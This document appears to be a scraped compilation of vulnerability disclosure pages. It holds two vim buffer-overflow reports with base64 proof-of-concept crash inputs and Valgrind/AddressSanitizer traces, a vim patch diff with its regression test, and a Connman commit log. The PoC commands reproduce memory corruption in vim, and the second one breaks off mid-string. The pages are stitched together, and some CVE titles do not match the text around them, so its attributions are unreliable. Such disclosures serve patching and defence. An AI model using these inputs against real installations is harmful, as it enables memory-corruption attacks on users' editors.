Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

Stack overflow occurs in spellsuggest.c.

commit : 44db8213d38c39877d2148eff6a72f4beccfb94e

**Proof of Concept**

    $ echo -ne "bm9ybRZzMDAwRzAw/TAwMDAwMDAwMDAwMApzaWwwbm9ybS4udnpHLi4uLi4uLi4uLi4uLi4uLnZ2
    ekcwICAgICB2IHo9" | base64 -d > minimized_poc
    
    # Valgrind
    $ ./vg-in-place -s ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!"
    ==596658== Memcheck, a memory error detector
    ==596658== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==596658== Using Valgrind-3.19.0.GIT and LibVEX; rerun with -h for copyright info
    ==596658== Command: ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c :qa!
    ==596658==
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658==
    ==596658== Process terminating with default action of signal 11 (SIGSEGV): dumping core
    ==596658==    at 0x4A2255B: kill (syscall-template.S:78)
    ==596658==    by 0x28FE98: may_core_dump (os_unix.c:3510)
    ==596658==    by 0x28FE4C: mch_exit (os_unix.c:3476)
    ==596658==    by 0x40A260: getout (main.c:1721)
    ==596658==    by 0x25302D: preserve_exit (misc1.c:2194)
    ==596658==    by 0x28E408: deathtrap (os_unix.c:1156)
    ==596658==    by 0x4A2220F: ??? (in /usr/lib/x86_64-linux-gnu/libc-2.31.so)
    ==596658==    by 0x32FCBC: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==
    ==596658== HEAP SUMMARY:
    ==596658==     in use at exit: 114,315 bytes in 593 blocks
    ==596658==   total heap usage: 1,864 allocs, 1,271 frees, 1,057,411 bytes allocated
    ==596658==
    ==596658== LEAK SUMMARY:
    ==596658==    definitely lost: 1,679 bytes in 6 blocks
    ==596658==    indirectly lost: 8 bytes in 3 blocks
    ==596658==      possibly lost: 268 bytes in 1 blocks
    ==596658==    still reachable: 112,360 bytes in 583 blocks
    ==596658==         suppressed: 0 bytes in 0 blocks
    ==596658== Rerun with --leak-check=full to see details of leaked memory
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    ==596658==
    ==596658== 1 errors in context 1 of 1:
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    Segmentation fault
    
    # ASAN
    $ ~/fuzzing/vim-asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S ~/fuzzing/valgrind/minimized_poc ":qa!"
    =================================================================
    ==250851==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff6b20 at pc 0x000000496710 bp 0x7fffffff3d10 sp 0x7fffffff34d8
    WRITE of size 32 at 0x7fffffff6b20 thread T0
        #0 0x49670f in __asan_memcpy (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f)
        #1 0xb08866 in go_deeper /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:2664:24
        #2 0xb08866 in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1766:4
        #3 0xafa3e1 in suggest_try_change /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1199:2
        #4 0xafa3e1 in spell_suggest_intern /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:995:5
        #5 0xafa3e1 in spell_find_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:870:6
        #6 0xaf6ffd in spell_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:545:5
        #7 0x894d7b in nv_zet /home/alkyne/fuzzing/vim-asan/src/normal.c:3398:7
        #8 0x864da8 in normal_cmd /home/alkyne/fuzzing/vim-asan/src/normal.c:1238:5
        #9 0x6a1a76 in exec_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c
        #10 0x6a0bb1 in exec_normal_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8592:5
        #11 0x6a0bb1 in ex_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8510:6
        #12 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #13 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #14 0xa71d9d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
        #15 0xa7042d in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
        #16 0xa7042d in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
        #17 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #18 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #19 0xd97b27 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3091:2
        #20 0xd97b27 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
        #21 0xd95139 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
        #22 0x7ffff7c260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41eacd in _start (/home/alkyne/fuzzing/vim-asan/src/vim+0x41eacd)
    
    Address 0x7fffffff6b20 is located in stack of thread T0 at offset 11776 in frame
        #0 0xb01cbf in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1247
    
      This frame has 11 object(s):
        [32, 152) 'stack.i.i.i' (line 4307)
        [192, 200) 'p.i.i.i' (line 4316)
        [224, 1240) 'wbadword.i.i.i' (line 4317)
        [1376, 2392) 'wgoodword.i.i.i' (line 4318)
        [2528, 2648) 'stack.i.i' (line 4132)
        [2688, 2942) 'theword.i' (line 3169)
        [3008, 3262) 'cword.i' (line 3267)
        [3328, 3582) 'tword' (line 1248)
        [3648, 11776) 'stack' (line 1249) <== Memory access at offset 11776 overflows this variable
        [12032, 12794) 'preword' (line 1250)
        [12928, 13182) 'compflags' (line 1255)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f) in __asan_memcpy
    Shadow bytes around the buggy address:
      0x10007fff6d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff6d60: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d70: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==250851==ABORTING
    

**Impact**

Stack bof may lead to exploit the program.

CVE-2022-0408: Stack-based Buffer Overflow in vim

Heap-based Buffer Overflow in GitHub repository vim prior to 8.2.

Permalink

Browse files

patch 8.2.4218: illegal memory access with bracketed paste in Ex mode

Problem:    Illegal memory access with bracketed paste in Ex mode.
Solution:   Reserve space for the trailing NUL.

*   Loading branch information

1 parent 8d02ce1 commit 806d037671e133bd28a7864248763f643967973a

Showing **3 changed files** with **7 additions** and **1 deletion**.

*   *   edit.c
    *   *   test\_paste.vim
    *   version.c

@@ -4452,7 +4452,8 @@ bracketed\_paste(paste\_mode\_T mode, int drop, garray\_T \*gap)

break;

  

case PASTE\_EX:

if (gap != NULL && ga\_grow(gap, idx) == OK)

// add one for the NUL that is going to be appended

if (gap != NULL && ga\_grow(gap, idx + 1) == OK)

{

mch\_memmove((char \*)gap->ga\_data + gap->ga\_len,

buf, (size\_t)idx);

@@ -90,6 +90,9 @@ func Test\_paste\_ex\_mode()

unlet! foo

call feedkeys("Qlet foo=\\"\\<Esc>\[200~foo\\<CR>bar\\<Esc>\[201~\\"\\<CR>vi\\<CR>", 'xt')

call assert\_equal("foo\\rbar", foo)

  

" pasting more than 40 bytes

exe "norm Q\\<PasteStart>0000000000000000000000000000000000000000000000000000000000000000000000\\<C-C>"

endfunc

  

func Test\_paste\_onechar()

@@ -750,6 +750,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

4218,

/\*\*/

4217,

/\*\*/

**0 comments on commit 806d037**

Please sign in to comment.

CVE-2022-0392: patch 8.2.4218: illegal memory access with bracketed paste in Ex mode · vim/vim@806d037

An issue was discovered in the DNS proxy in Connman through 1.40. The TCP server reply implementation has an infinite loop if no data is received.

AgeCommit message (Expand)AuthorFilesLines 12 dayswispr: Simplify the IP version checkHEADmasterDaniel Wagner1\-5/+1 12 dayswispr: Fix context refcounting in wispr\_portal\_request\_portal()Daniel Wagner1\-5/+5 12 daysservice: Track online check for IPv4 and IPv6 separatelyDaniel Wagner1\-12/+27 2022-08-28ipconfig: Don't add invalid gateway routesDaniel Wagner1\-1/+1 2022-08-28wisrp: Handle wispr\_portal\_detect failuresDaniel Wagner1\-24/+32 2022-08-28resolver: Add path to resolv.conf to config optionsJakub Jirutka3\-7/+48 2022-08-01AUTHORS: Mention Nathan's contributionsDaniel Wagner1\-0/+1 2022-08-01gweb: Fix OOB write in received\_data()Nathan Crandall1\-1/+1 2022-08-01wispr: Update portal context referencesDaniel Wagner1\-12/+22 2022-08-01wispr: Add reference counter to portal contextDaniel Wagner1\-10/+42 2022-08-01wispr: Ignore NULL proxyDaniel Wagner1\-1/+1 2022-08-01wispr: Rename wispr\_portal\_list to wispr\_portal\_hashDaniel Wagner1\-11/+11 2022-05-25wispr: Prevent use-after-free from \_\_connman\_wispr\_stop()Seung-Woo Kim1\-11/+5 2022-05-25doc: Add note SingleConnectedTechnology can't be used with VPNDaniel Wagner1\-1/+2 2022-05-16service: Add "Ethernet" property for VPN into n.c.Manager GetServicesJakub Jirutka1\-1/+1 2022-05-16clock: fix time update transition auto->manualRyan Smith1\-6/+3 2022-04-14wispr: Fix online check when using WPAD/PACRyan Smith1\-6/+30 2022-04-14dhcp: Set proxy properly when applying DHCP leaseRyan Smith1\-2/+1 2022-04-14gdhcp: fix server address byte orderRyan Smith1\-1/+1 2022-04-14iwd: Fix connection with invalid passphrase formatEmmanuel VAUTRIN1\-1/+3 2022-04-08AUTHORS: Mention Daniel's contributionsDaniel Wagner1\-0/+1 2022-04-08vpn: Replace hardcoded paths with RUNSTATEDIRDaniel Linjama2\-3/+3 2022-04-08build: Support configurable run dir with RUNSTATEDIRDaniel Linjama2\-0/+3 2022-04-08ofono: Do not change regdom when it follows timezoneJussi Laakkonen1\-0/+5 2022-04-08timezone: Change regdom along timezone, use localtime configJussi Laakkonen1\-5/+100 2022-04-08main: Add RegdomFollowsTimezone option for regdom changesJussi Laakkonen2\-0/+19 2022-04-08main: Add path to localtime to config options.Jussi Laakkonen2\-0/+22 2022-04-08timeserver: include the reason why a timeserver sync is requestedNicky Geerts4\-7/+35 2022-03-07timeserver: refresh the nameservers before each lookupNicky Geerts1\-41/+46 2022-03-04iwd: Forget network on service removalEmmanuel VAUTRIN5\-0/+58 2022-03-04dnsproxy: add standalone test version of dnsproxy and a test script for itMatthias Gerstner4\-1/+284 2022-02-27service: Check if hidden service has a pending request on agentJussi Laakkonen1\-1/+4 2022-02-27agent: Add support to check for active pending requestsJussi Laakkonen4\-0/+39 2022-02-27AUTHORS: Mention Sebastian's contributionsDaniel Wagner1\-0/+1 2022-02-27vpn/vpn-polkit.policy: Replace unsupported "auth\_\*\_keep\_session" by "auth\_\*\_k...Sebastian Pipping1\-2/+2 2022-02-27iwd: Fix disabling tethering not working for brcmfmacJonathan Liu1\-5/+4 2022-02-27main: Set default online check URL also when no config providedDaniel Wagner1\-2/+8 2022-02-21dnsproxy-test: support command line specification of dnsproxy portMatthias Gerstner1\-2/+9 2022-02-21dnsproxy: support programmatic configuration of the default listen portMatthias Gerstner2\-2/+9 2022-02-21.gitignore: also ignore emacs backup filesMatthias Gerstner1\-0/+1 2022-02-21dnsproxy: protocol\_offset: remove error return case and return size\_tMatthias Gerstner1\-27/+14 2022-02-21dnsproxy: remove unnecessarily shadowed variableMatthias Gerstner1\-1/+1 2022-02-21dnsproxy: remove unused domain parameter from \`remove\_server()\`Matthias Gerstner1\-4/+3 2022-02-21iwd: Use same signal strength calculation as wpa\_supplicantJonathan Liu1\-1/+3 2022-02-21iwd: Fix typo in warning message when enabling AccessPoint modeJonathan Liu1\-1/+1 2022-02-21wifi: Duplicate GSupplicantSSID pointer membersNiel Fourie2\-39/+83 2022-01-28Release 1.411.41Marcel Holtmann2\-1/+9 2022-01-25unit: Fix missing declarations in test-iptablesEmmanuel VAUTRIN1\-2/+2 2022-01-25AUTHORS: Add Matthias' contributionsDaniel Wagner1\-0/+1 2022-01-25dnsproxy: Keep timeout in TCP case even after connection is establishedMatthias Gerstner1\-5/+0 2022-01-25dnsproxy: Avoid 100 % busy loop in TCP server caseMatthias Gerstner1\-0/+12 2022-01-25dnsproxy: Validate input data before using themDaniel Wagner1\-5/+26 2022-01-25dnsproxy: Update TCP length headerMatthias Gerstner1\-0/+3 2022-01-25main: Use g\_strdup for online\_check\_ipv{4,6}\_url configDaniel Wagner1\-2/+9 2022-01-23service: Fix native connection with wrong passphraseEmmanuel VAUTRIN1\-0/+9 2022-01-21iwd: Mark only reachable networks as availableEmmanuel VAUTRIN1\-1/+3 2022-01-21iwd: Fix connection with no passphraseEmmanuel VAUTRIN1\-0/+2 2022-01-21iwd: Fix station in scan callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-12-19AUTHORS: Mention Christian's contributionsDaniel Wagner1\-0/+1 2021-12-19ipconfig: Do not enable/disable ipv6 for all ifsChristian Taedcke1\-0/+6 2021-12-19Add ObjectManager interface to connmanMichael Trimarchi1\-1/+1 2021-11-18service: Support hot-plug of technologies by updating ipconfig indexJussi Laakkonen1\-2/+15 2021-11-18openvpn: Improve configuration value processingJussi Laakkonen1\-44/+76 2021-11-18vpn-provider: Support checking if provider setting key exists.Jussi Laakkonen2\-0/+8 2021-10-26tether: Fix connman\_technology\_get\_wifi\_tetheringMichael Trimarchi1\-2/+6 2021-10-20dnsproxy: Fix uninitialized false positive in dnsproxyEmmanuel VAUTRIN1\-1/+1 2021-10-20tools: Fix uninitialized errors in iptables testsEmmanuel VAUTRIN2\-2/+2 2021-10-20config: Cleanup of iwd provision\_service\_wifi()Emmanuel VAUTRIN1\-4/+2 2021-10-15gsupplicant: Fix error return typeDaniel Wagner1\-2/+2 2021-10-15inet: Remove unused ipv6\_addr\_advert\_multDaniel Wagner1\-7/+0 2021-10-15build: Only enable -Wcast-align for gccDaniel Wagner1\-1/+3 2021-10-15client: Update the connmactl to support optional tethering channelMichael Trimarchi1\-14/+46 2021-10-15tethering: Add TetheringFreq parameter documentationMichael Trimarchi1\-0/+7 2021-10-15tethering: Add possibility to configure the access point frequencyMichael Trimarchi5\-7/+52 2021-10-15tethering: Reduce the number of parameters of tech\_set\_tetheringMichael Trimarchi8\-32/+33 2021-10-04AUTHORS: Mention Michael's contributionsDaniel Wagner1\-0/+1 2021-10-04manager: Add TetheringClientsChanged GBUS\_SIGNALMichael Trimarchi1\-0/+3 2021-10-04service: Report errors to user in native modeVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-10-04iwd: Fix timeout error on new connectionVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-10-04iwd: Fix improper IPv4/6 attributes when disconnectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+2 2021-10-04iwd: Fix missing Ethernet attributesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+8 2021-09-13doc: Document AuthErrorLimit in VPN connection APIJussi Laakkonen1\-0/+13 2021-09-13openvpn: Default to 10 AuthErrorLimit unless set by userJussi Laakkonen1\-0/+9 2021-09-13vpn-provider: Add auth error check heuristic to avoid losing credsJussi Laakkonen2\-0/+112 2021-09-13vpn-provider: Ignore error adding when state is idle/unknownJussi Laakkonen1\-0/+15 2021-09-13vpn: Report EALREADY back to caller if VPN is already disconnectingJussi Laakkonen1\-1/+2 2021-09-13gsupplicant: Add support for WPA3-Personal transition modeAriel D'Alessandro1\-10/+19 2021-08-31doc: Add new openconnect input fieldsLukáš Karas1\-0/+13 2021-08-30openconnect: Add support for 2nd passwordLukáš Karas2\-2/+85 2021-08-30vpn: Refactor connect\_reply() and handle NoCarrier -> ENOLINK errorJussi Laakkonen1\-2/+12 2021-08-30vpn-provider: Implement connmand online state checkingJussi Laakkonen1\-1/+356 2021-08-30service: Do not trigger wispr start when EnableOnlineCheck is disabledDaniel Wagner1\-0/+6 2021-08-30service: Move wispr start code into helperDaniel Wagner1\-16/+15 2021-08-29network: Do not disconnect decice on network connectDaniel Wagner1\-2/+0 2021-08-29service: Prevent auto connection during passphrase requestVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+25 2021-08-29wispr: Add online check url config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-15/+68 2021-08-29service: Fix default service update on ready stateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+2 2021-08-29service: Ignore state information in service reorderingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+1 2021-08-17pptp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-43/+84 2021-08-17l2tp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-40/+75 2021-08-17l2tp: Create control file for xl2tpdMatt Vogt1\-2/+16 2021-07-28gdhcp: Do not process missing DHCP\_SERVER\_ID fieldsDaniel Wagner1\-0/+5 2021-07-26service: service\_update\_preferred\_order cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-17/+5 2021-07-20AUTHORS: Fix Rahul's email addressDaniel Wagner1\-1/+1 2021-07-20main: Fix a memory leak for str\_list in parse\_configRahul Jain1\-0/+2 2021-07-02service: apply\_relevant\_default\_downgrade cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+3 2021-07-02service: Let PreferredTechnologies overrule connected service sortingDaniel Wagner1\-13/+27 2021-06-30agent: Always inform upper layer via callbackDaniel Wagner1\-1/+1 2021-06-23service: Ask for password when using native autoconnectDaniel Wagner1\-1/+2 2021-06-23iwd: Do not try to handle out of memory failsDaniel Wagner1\-38/+6 2021-06-23vpn-rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-23rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-21README: Add IRC channel infoDaniel Wagner1\-0/+4 2021-06-21AUTHORS: Mention Lukáš' contributionsDaniel Wagner1\-0/+1 2021-06-21dnsproxy: Replace strncopy by memcpyLukáš Karas1\-1/+1 2021-06-14AUTHORS: Mention Ariel's contributionsDaniel Wagner1\-0/+1 2021-06-14wifi: Add wpa\_supplicant WPA3-SAE supportAriel D'Alessandro3\-3/+57 2021-06-10Release 1.401.40Marcel Holtmann2\-1/+6 2021-06-09AUTHORS: Mention Alyssa's contributionsDaniel Wagner1\-0/+1 2021-06-09README: fix typoAlyssa Ross1\-1/+1 2021-06-07AUTHORS: Mention Valery's contributionsDaniel Wagner1\-0/+1 2021-06-07dnsproxy: Check the length of buffers before memcpyValery Kashcheev1\-9/+11 2021-06-02README: Update mailing list infoDaniel Wagner1\-2/+8 2021-05-14README: Remove the 01.org website and the 01.org JiraMarcel Holtmann1\-5/+1 2021-05-13main: Cleanup of vendor class id and wifi config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)7\-46/+10 2021-05-05wispr: Support of common redirection status codesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+5 2021-04-27timerserver: Fix time update manual->autoDaniel Wagner1\-2/+2 2021-04-25service: Disable native autoconnect calls for providersDaniel Wagner1\-2/+2 2021-04-18peer: Open code g\_memdupDaniel Wagner1\-1/+4 2021-04-18wifi: Open code g\_memdupDaniel Wagner1\-7/+18 2021-04-18Rewrite openconnect plugin to use libopenconnectSanttu Lakkala3\-382/+525 2021-04-18service: Teach autoconnect algorithm native modeDaniel Wagner2\-29/+56 2021-04-18network: Add \_\_connman\_network\_native\_autoconnect()Daniel Wagner2\-0/+8 2021-04-18iwd: Filter out connect failure for auto connect modeDaniel Wagner1\-1/+1 2021-04-18iwd: Init AutoConnect of know networksDaniel Wagner1\-0/+26 2021-04-18service: Factor auto connect trigger code into a new functionDaniel Wagner1\-34/+40 2021-04-18service: Remove unused \_\_connman\_service\_disconnect\_all()Daniel Wagner2\-31/+0 2021-04-05wireguard: Copy interfance names obeying lengths rulesDaniel Wagner1\-1/+1 2021-04-05ethernet: Copy interfance names obeying lengths rulesDaniel Wagner1\-5/+7 2021-04-05ipconfig: Refactor /proc value get/set to separate functionsJussi Laakkonen1\-85/+97 2021-04-05service: Sort VPNs using the transport service if connectedJussi Laakkonen1\-0/+45 2021-04-05provider: Add function to get transport ident from VPNJussi Laakkonen2\-0/+11 2021-04-05vpn: Return transport ident with get\_property()Jussi Laakkonen1\-7/+15 2021-03-27dnsproxy: Enable DNS servers on connected VPN if split routing changesJussi Laakkonen1\-0/+11 2021-03-27timeserver: Fix false error messageJustin Maggard1\-1/+1 2021-03-27iwd: Fix typo in error message when stopping AccessPoint modeJonathan Liu1\-1/+1 2021-03-27service: Allow only user connection after WiFi failureVAUTRIN Emmanuel (Canal Plus Prestataire)1\-4/+10 2021-03-27service: Fix disconnection search before connectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-03-27service: Complete only after user connection retriesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+3 2021-03-27mailmap: Update non-canonical log entriesDaniel Wagner1\-0/+3 2021-02-24service: Add online to ready transition featureEmmanuel VAUTRIN6\-13/+78 2021-02-22service: Fix integer type for online check intervalDaniel Wagner1\-3/+3 2021-02-15service: Add online check interval config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-19/+88 2021-02-15wifi: Reset disconnecting status of any networkVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-10wifi: Check valid network in disconnect callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-08Release 1.391.39Marcel Holtmann2\-1/+7 2021-02-05AUTHORS: Mention Colin's contributionsDaniel Wagner1\-0/+1 2021-02-05dnsproxy: Add length checks to prevent buffer overflowColin Wee1\-3/+11 2021-02-05gdhcp: Avoid leaking stack data via unitiialized variableColin Wee1\-1/+1 2021-02-05gdhcp: Avoid reading invalid data in dhcp\_get\_optionColin Wee4\-20/+38 2021-02-05service: Restart online check when default service changesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+10 2021-02-05timeserver: Reset time sync on system timeserver updateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-05clock: Add TimeSynced signal emitted when the system time has been syncedVAUTRIN Emmanuel (Canal Plus Prestataire)4\-1/+67 2021-01-25AUTHORS: Mention Gabriel's contributionsDaniel Wagner1\-0/+1 2021-01-25wifi: Always disconnect connection completelyGabriel FORTE1\-8/+37 2020-12-28timeserver: Split new service and configuration updateDaniel Wagner3\-27/+33 2020-12-28services: Escape passphrase stringDaniel Wagner2\-7/+17 2020-12-23wifi: Base BSS expiration age on long scanning intervalEmmanuel VAUTRIN1\-0/+21 2020-12-22wifi: Fix wireless interface not being added to tether bridge sometimesJonathan Liu1\-4/+5 2020-12-22openvpn: Update documemtation for --protoDaniel Wagner1\-1/+1 2020-12-22vpnc: Do not lose credentials with VPN agent timeoutsJussi Laakkonen1\-6/+15 2020-12-14vpn: Export vpn\_ipconfig\_foreach as linker symbolDaniel Wagner4\-4/+4 2020-12-14vpn: Do not do mixed declerations and codeDaniel Wagner1\-18/+14 2020-12-14src: Test return value of inet\_pton consistentlyDaniel Wagner5\-17/+17 2020-12-11doc: Document VPN connection SplitRouting booleanJussi Laakkonen1\-1/+8 2020-12-11vpn-provider: Support SplitRouting option from connmandJussi Laakkonen1\-21/+158 2020-12-11vpn-provider: Drop route management from vpndJussi Laakkonen5\-100/+13 2020-12-11vpn-config: Implement function to get boolean from keyfileJussi Laakkonen2\-4/+21 2020-12-11vpn: Support SplitRouting in D-Bus variables, improve route codeJussi Laakkonen1\-20/+207 2020-12-11provider: Add support for managing SplitRoutingJussi Laakkonen2\-0/+105 2020-12-11service: Load and apply service settings after D-Bus registrationJussi Laakkonen1\-3/+3 2020-12-11service: Add property changed signal for SplitRouting valueJussi Laakkonen2\-0/+25 2020-12-11service: Expose set\_split\_routing() for internal useJussi Laakkonen2\-10/+15 2020-12-11service: Split service move functionality for internal useJussi Laakkonen2\-16/+46 2020-12-11dbus: Report back the return value of g\_dbus\_send\_message()Jussi Laakkonen1\-18/+6 2020-12-11inet: Do not add broadcast address for P2P/VPNsJussi Laakkonen20\-36/+123 2020-12-11inet: Refactor with getifaddrs() and add network route getter functionJussi Laakkonen2\-243/+326 2020-12-11inet: Add function for detecting a default routeJussi Laakkonen2\-0/+17 2020-12-11connection: Add getter for the phy index of a VPN transport serviceJussi Laakkonen2\-0/+24 2020-12-11wispr: check service before stopping portal detectionSergey Matyukevich1\-1/+17 2020-12-11AUTHORS: Mention Boleslaw's contributionsDaniel Wagner1\-0/+1 2020-12-11neard: Fix memory leaks with PendingCallBoleslaw Tokarski1\-1/+1 2020-12-11vpn: Fix memory leaks with PendingCallBoleslaw Tokarski1\-11/+30 2020-12-11vpn: Secure a race condition with flagBoleslaw Tokarski1\-2/+8 2020-12-11Revert "gdhcp: Make DHCP client timeouts suspend aware"Daniel Wagner2\-134/+52 2020-12-04vpn-provider: Cancel agent requests when removing VPNJussi Laakkonen1\-0/+6 2020-12-04AUTHORS: Mention Emmanuel's contributionsDaniel Wagner1\-0/+1 2020-12-04services: Return error for invalid hidden namesEmmanuel Vautrin1\-8/+12 2020-12-04AUTHORS: Mention Pieter's contributionsDaniel Wagner1\-0/+1 2020-12-04rtnl: Mark dsa interfaces as ethernet typePieter Cardoen1\-0/+3

CVE-2022-23098: connman/connman.git - Connection Manager

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

*   Heap Overflow and arbitrary 41 bytes write.
    
*   Unsorted bin doubly linked list corruption.
    
*   commit hash : 058ee7c5699ef551be5aa04c66b3cffc436e9b08
    

**Proof of Concept**

    $ echo -ne "bm9ybTBv7wX//wUwIDUwMDAwMDAwezAtMDAwMP/yAAD6MDAwMDAwMDAwMDQwKSkpMDAQMDAwMDAw
    AAogIFVpbCFub3JtCPkICAgIEAAAAA4KICBzFCwUFBQUFBQUFBQUFBQUFGxrsWUKICBzaWwhbm9y
    bQgICBj31/cwFhcYsk8qAAQwMjIyMjIiMjKAMDAwMDAwMDAwMDCAADAAAAEA/38AADAwMCVkZ4Vv
    ZXh0YBQUFBQPa25lMDAwfAACdCAUFBQUD2tuZQnTNnIyMjIyMjIyMDAwMDBAMDA2NjY2NsbGAAHC
    xjAwAQAwMDAwMDAwMDQwgBkBADAwMDAyMDAwMDBTMDAwMDAwgDARMDAwMDBAMDAwMDAwMDA3MEUw
    MDAwMDAwMDBSMHAwLTAwMDAwMDAwMDAwMDAwMDAwMDAwMDBAMDAwMDAwMDAwNDAwAH8wMDAwMDAw
    MIAwnjCyTyp8fHx8fHx0IDBNMDAwMAAAMDAwMAAKICBzaWwhbm9ybQgICAgIEDAwMDAwMDA2MDAw
    MCIwMEAwMDAwfWdnZ2lnZ2dOJ2dVZ2dnZ2dnZ2dnZ2cmMDAwMDAyMDB4dCAUFBQUD2tuZQogMDAw
    MDAwMDAwMCEwADAwAAAAgDAwMDAwMDD/fyAwMA9LEzAwMDAwMHswLTAwMDD/8gAA+jAwMDAwMDAw
